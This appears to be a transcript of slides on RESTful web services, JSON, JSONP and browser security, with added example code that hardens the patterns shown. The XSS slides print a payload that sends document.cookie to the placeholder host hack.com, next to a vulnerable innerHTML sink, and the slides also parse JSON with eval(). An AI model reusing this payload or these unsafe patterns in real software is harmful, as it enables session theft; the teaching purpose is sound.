Restful Web Services. By Loukik Purohit & Rohit Ghatol
Web Service: a service exchanges messages (XML/JSON) with browser, desktop and mobile clients (example: CricInfo).
Using a browser (user intervention): in a vacation subsystem the user books the cab, the plane and the hotel one at a time.
Automated (machines interacting with each other): the vacation subsystem calls the cab, plane and hotel booking services itself and confirms by SMS/email.
REST in layman's terms: an organisation is structured into departments (HR, Accounts, Admin).
Organized structure: to get the address of user 1, go to \Organisation\Users\1\address
The same analogy applies to the web:
Request to get all users: http://xyz.com/users
Request to get user 1: http://xyz.com/users/1
Request to get the address of user 1: http://xyz.com/users/1/address
Request-Response (GET)
GET Request:
GET /users/1 HTTP/1.1
Host: xyz.com
Accept: application/xml

GET Response:
<users>
  <user>
    <id>1</id>
    <name>Loukik</name>
    <address>Pune</address>
    <skill>java</skill>
  </user>
  <user>
    <id>2</id>
    <name>...</name>
    <address>...</address>
    <skill>...</skill>
  </user>
</users>

Request-Response (POST)
POST Request:
POST /users HTTP/1.1
Host: xyz.com
Content-Type: application/xml
Accept: application/xml

<user>
  <name>Rohit</name>
  <address>Pune</address>
  <skill>C++</skill>
</user>

POST Response:
<result>
  <id>3</id>
</result>

Anatomy of an HTTP request
URL: http://xyz.com/services/users
HTTP headers:
Method: PUT
Accept: application/xml
Content-Type: application/xml
HTTP body:
<user>
  <name>Rohit</name>
  <address>Pune</address>
  <skill>C++</skill>
</user>
Four verbs for every noun: GET, POST, PUT, DELETE, e.g. on http://example.com/customer/123
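The noun/verb pairs above, worked through as an in-memory dispatcher. This is an added example, not code from the slides: the seed records, the status codes, the route table and the rule that only the server assigns ids are assumptions of the example. The point a practitioner wants to see is that a representation sent by the client is filtered to the fields the client is allowed to set, so a client-supplied id or any other server-owned field is dropped rather than stored.

```javascript
// Added example (not from the slides): an in-memory dispatcher for the four
// verbs on the "users" noun. Seed data, status codes and the server-assigns-ids
// rule are assumptions of this example.
const users = new Map([
  [1, { id: 1, name: "Loukik", address: "Pune", skill: "java" }],
  [2, { id: 2, name: "Rohit", address: "Pune", skill: "C++" }],
]);
let nextId = 3;

// Accept only the fields a client may set and ignore everything else (such as a
// client-supplied id), so a representation cannot smuggle in server-owned data.
function pickUserFields(body) {
  const out = {};
  for (const key of ["name", "address", "skill"]) {
    if (typeof body?.[key] !== "string" || body[key].length === 0 || body[key].length > 200) {
      return null;
    }
    out[key] = body[key];
  }
  return out;
}

const reply = (status, body) => ({ status, body });

// Route table: one entry per verb/noun pair; regex groups become the params.
const routes = [
  { method: "GET", pattern: /^\/users$/, handler: () => reply(200, [...users.values()]) },
  { method: "GET", pattern: /^\/users\/(\d+)$/, handler: ([id]) => {
      const u = users.get(Number(id));
      return u ? reply(200, u) : reply(404, { error: "no such user" });
  } },
  { method: "GET", pattern: /^\/users\/(\d+)\/address$/, handler: ([id]) => {
      const u = users.get(Number(id));
      return u ? reply(200, { address: u.address }) : reply(404, { error: "no such user" });
  } },
  { method: "POST", pattern: /^\/users$/, handler: (_, body) => {
      const fields = pickUserFields(body);
      if (!fields) return reply(400, { error: "name, address and skill are required strings" });
      const id = nextId++;
      users.set(id, { id, ...fields });
      return reply(201, { id });   // the JSON counterpart of <result><id>3</id></result>
  } },
  { method: "PUT", pattern: /^\/users\/(\d+)$/, handler: ([id], body) => {
      const fields = pickUserFields(body);
      if (!fields) return reply(400, { error: "name, address and skill are required strings" });
      if (!users.has(Number(id))) return reply(404, { error: "no such user" });
      users.set(Number(id), { id: Number(id), ...fields });
      return reply(200, users.get(Number(id)));
  } },
  { method: "DELETE", pattern: /^\/users\/(\d+)$/, handler: ([id]) =>
      users.delete(Number(id)) ? reply(204, null) : reply(404, { error: "no such user" }) },
];

// Resolve (method, path) to a handler; unknown verbs on a known noun get 405
// with the allowed verbs, unknown nouns get 404.
function dispatch(method, path, body) {
  for (const r of routes) {
    if (r.method !== method) continue;
    const m = r.pattern.exec(path);
    if (m) return r.handler(m.slice(1), body);
  }
  const allowed = routes.filter((r) => r.pattern.test(path)).map((r) => r.method);
  return allowed.length ? reply(405, { allowed }) : reply(404, { error: "no such resource" });
}
```

Calling dispatch("GET", "/users/1/address") returns { status: 200, body: { address: "Pune" } }, and dispatch("POST", "/users", { id: 99, name: "Rohit", address: "Pune", skill: "C++" }) creates user 3 regardless of the id the client sent.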
JSON: can data be represented in the form of a list and a map? Here's JSON, parsed the way the slides show it:
var myObject = eval('(' + myJSONtext + ')');
JSON Parser
What JSON looks like, and accessing it in JavaScript code:
var result = {
  "users": [
    { "id": "1", "name": "loukik", "address": "Pune", "skill": "java" },
    { "id": "2", "name": "rohit", "skill": "C++" }
  ]
};
result.users[0].name   // "loukik"
REST
Programmable Web (programmableweb.com): your source for 3000+ web service APIs.
Implement a RESTful web service by hand: write a servlet; implement doGet, doPost, doDelete; write the business logic; create your messages, in JSON.
JAX-RS to the rescue: marrying your code to an API (EJB, Servlet) vs. staying a POJO: being single is great!
JAX-RS: JSR 311. More info at http://java.sun.com/javaee/6/docs/tutorial/doc/giepu.html
JAX-RS flow: HTTP request (JSON) -> JAX-RS servlet -> JAXB (@XmlRootElement) -> POJO model -> business logic -> POJO model -> JAXB (@XmlRootElement) -> JSON -> HTTP response.
Spring REST: based on Spring MVC; negotiated view-based rendering; HTTP message converters.
Enunciate: your web service API in; your web service API + full HTML documentation + client-side libraries out.
What does Enunciate do for me? From the POJOs behind your JAX-RS / SOAP endpoints it generates Java docs and client-side libraries (C, Objective-C, .NET, GWT, AMF, Java, JSON).
Enunciate is an engine for dramatically enhancing your Java web service API. It is primarily a build-time tool: develop your web service API, then attach Enunciate to your build process.
Cross Site Scripting and the Same Origin Policy (the slides call it the Single Origin Policy): a page at http://geochirp.com wants to make Ajax calls to maps.google.com and twitter.com.
Same Origin Policy: imposed by the browser. It restricts Ajax calls and access to an iframe's DOM: JavaScript on http://www.abc.com cannot reach into an iframe loaded from http://xyz.com.
So how to do mashups? Use a proxy: http://geochirp.com/proxy fetches from maps.google.com and twitter.com on behalf of the page at http://geochirp.com.
So how to do mashups? Use JSONP: the page at http://geochirp.com makes JSONP calls directly to maps.google.com and twitter.com.
What is JSONP? An AJAX call from ABC.com to XYZ.com is not allowed by the browser, but including a static script hosted on another domain (http://xyz.com/script.js) is allowed.
The same holds for a dynamic script: http://xyz.com/services/users/1?callback=myfun
JSONP explained: http://xyz.com/services/users/1?callback=myfunc returns the JSON wrapped in a call to the named function.
JSON (subject to the Same Origin Policy):
{ "id": "1", "name": "loukik", "address": "Pune", "skill": "java" }
JSONP (no such restriction):
myfunc({ "id": "1", "name": "loukik", "address": "Pune", "skill": "java" });
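Both sides of the JSON/JSONP distinction, worked as one added example that serves the "Here's JSON" slide (parsing with eval) and the "JSONP explained" slide above; it is not code from the slides. On the consuming side it uses JSON.parse instead of eval, so a response that is really a script fails to parse instead of running, and it checks the shape of what came back. On the producing side it builds the myfunc({...}); wrapper and validates the callback name taken from the ?callback= parameter, because a JSONP endpoint echoes that name straight into executable JavaScript. USERS_JSON is a constructed sample; SAFE_CALLBACK, parseUsers, toJsonp and serveUser are names invented for this example.

```javascript
// Added example (not from the slides): the slide's user record as JSON and as
// JSONP. USERS_JSON is constructed; the function names are assumptions.

// Constructed sample: the document from the "What JSON looks like" slide.
const USERS_JSON = JSON.stringify({
  users: [
    { id: "1", name: "loukik", address: "Pune", skill: "java" },
    { id: "2", name: "rohit", skill: "C++" },
  ],
});

// Consumer side. JSON.parse accepts only JSON, so a body such as
// "myfunc({...});" raises a SyntaxError instead of executing, which is the
// difference between this and eval('(' + text + ')').
function parseUsers(text) {
  const doc = JSON.parse(text);
  if (doc === null || typeof doc !== "object" || !Array.isArray(doc.users)) {
    throw new TypeError("expected an object with a users array");
  }
  return doc.users.map((u, i) => {
    if (typeof u.id !== "string" || typeof u.name !== "string") {
      throw new TypeError(`user ${i}: id and name must be strings`);
    }
    // Optional fields get a default so callers never see undefined.
    return { id: u.id, name: u.name, address: u.address ?? "", skill: u.skill ?? "" };
  });
}

// Producer side. The callback name ends up inside a <script>, so only plain
// (optionally dotted) identifiers are accepted.
const SAFE_CALLBACK = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function toJsonp(data, callback) {
  if (typeof callback !== "string" || !SAFE_CALLBACK.test(callback)) {
    throw new RangeError("invalid callback name");
  }
  // JSON is not a strict subset of JavaScript: U+2028/U+2029 are legal inside
  // JSON strings but terminate a line in a script, so escape them.
  const json = JSON.stringify(data)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return `${callback}(${json});`;
}

// Handler for a request like /services/users/1?callback=myfunc: plain JSON
// when no callback was given, JSONP otherwise.
function serveUser(user, callback) {
  if (callback === undefined) {
    return { contentType: "application/json", body: JSON.stringify(user) };
  }
  return { contentType: "application/javascript", body: toJsonp(user, callback) };
}
```

parseUsers(USERS_JSON)[1].address is "" (the slide's second user has no address), and toJsonp({ id: "1", ... }, "myfunc") yields exactly the myfunc({...}); line shown on the slide, while a callback value such as "alert(1);//" is rejected before it can reach the response.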
JSONP Code Example
<html>
<head>
<script>
function myfunc(data){
  table.update(data);
}
</script>
</head>
<body>
<table>
<!-- employee table -->
<tr><td>Name</td><td>Address</td><td>Role</td></tr>
<tr><td>Rohit</td><td>Pune</td><td>Architect</td></tr>
<tr><td>Loukik</td><td>Pune</td><td>Geek</td></tr>
</table>
<button id="addEmployee">Add</button>
<button id="next100">Next 100</button>
<script src="http://xyz.com/services/fetchemployess?page=1&jsonp=myfunc"></script>
</body>
</html>
XSS: the attacker posts <script>attack script</script> on the ScrapBook website; a user logs in, views it, and is hacked!!!
How to do XSS? The server needs an XSS vulnerability. What if I put HTML with some JavaScript in the text area? Say the dev uses div.innerHTML in the code that posts a scrap:
function postScrap(){
  div.innerHTML = textarea.value;
}
How to do XSS? With div.innerHTML in postScrap(), a scrap like this is rendered as markup for everyone who views it:
<h1>Look at this cool image</h1> <img src='http://hack.com/?cookie=" + encodeURI(document.cookie)'> </img>
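The vulnerable postScrap() from the slides next to its hardened forms, as an added example that is not code from the slides. The element shapes (plain objects standing in for the div and the textarea) and the escapeHtml/renderScrapRow helpers are assumptions of the example. The fix is to treat a scrap as text: either assign it with textContent so the browser never parses it, or, where it has to be spliced into an HTML string, escape the characters that can open or close markup or an attribute.

```javascript
// Added example (not from the slides): postScrap() as on the slide (vulnerable)
// beside two hardened forms. Element shapes and helper names are assumptions.

// Vulnerable: the textarea content is parsed as HTML, so markup submitted in a
// scrap (including elements that call out to another host) is rendered for
// every user who views the page.
function postScrapUnsafe(div, textarea) {
  div.innerHTML = textarea.value;
}

// Hardened (DOM): assign the scrap as text. "<h1>" shows up literally and no
// element is ever created from it.
function postScrapSafe(div, textarea) {
  div.textContent = textarea.value;
}

// Hardened (string templates): when the scrap must be spliced into an HTML
// string, escape the five characters that can change the parse.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Renders one row of the employee table from user-controlled fields.
function renderScrapRow(name, scrap) {
  return `<tr><td>${escapeHtml(name)}</td><td>${escapeHtml(scrap)}</td></tr>`;
}
```

With a scrap of "<h1>Look at this cool image</h1><img src=x>", postScrapSafe leaves innerHTML untouched and stores the string in textContent, and renderScrapRow emits &lt;h1&gt; in place of the tag.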
XSRF: Cross Site Request Forgery. Unauthorized commands are transmitted from a user that the website trusts; it exploits the trust that a site has in a user's browser.
XSRF: the user logs in to the ScrapBook website; the attacker sends a mail with a script; the user opens the mail and the ScrapBook website is hacked!!!
How to do XSRF: is it possible? The browser holds your sessions. What if I made you visit a page which uses your session to do the hack?
Aye mate! How come I can use Google+ and Facebook Like here?